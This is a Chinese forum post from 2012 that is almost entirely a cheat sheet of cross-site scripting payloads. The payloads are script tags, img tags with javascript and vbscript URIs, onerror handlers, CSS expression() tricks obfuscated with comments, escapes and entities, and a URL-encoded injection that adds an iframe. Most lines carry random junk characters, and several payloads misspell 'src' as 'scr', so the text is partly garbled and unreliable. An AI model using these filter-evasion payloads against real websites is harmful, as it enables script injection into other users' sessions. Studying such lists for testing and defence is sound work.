<script>alert("跨站")</script> (最常用)
: E3 r% a- _) X; C) p<img scr=javascript:alert("跨站")></img>3 O- o2 O) e: r! V% ~* o
<img scr="javascript: alert(/跨站/)></img>
. [& _' j3 z. H6 h5 t1 Z t<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)7 |. A- ]+ y5 ?5 i" X1 F9 e |
<img scr="#" onerror=alert(/跨站/)></img>
+ | _1 z; A9 \) |<img scr="#" style="xss:expression(alert(/xss/));"></img>
( u+ {8 w% W; G, @9 _6 [8 z<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
' R. Y7 _+ P7 R( Y" e<img src=vbscript:msgbox ("xss")></img>
/ ^6 p& [7 v; A0 o* v1 h<style> input {left:expression (alert('xss'))}</style>' n# t/ N( N/ s4 D/ j! l8 r
<div style={left:expression (alert('xss'))}></div>8 t2 i$ y, r! R( |2 |1 s- S
<div style={left:exp/* */ression (alert('xss'))}></div>
# b- p# Q9 o5 j4 n0 N$ R<div style={left:\0065\0078ression (alert('xss'))}></div>4 V9 K/ n( O3 z( O9 v
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
6 Q! e" g7 ~1 @unicode <div style="{left:expRessioN (alert('xss'))}">/ X7 a2 E( ^9 M2 L
3 L/ T5 Z. B: ?% Z
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["1 {) q0 w8 |3 A. L3 [3 ?- F6 v! M
|
发表于 2012-9-15 14:09:13
收藏
支持
反对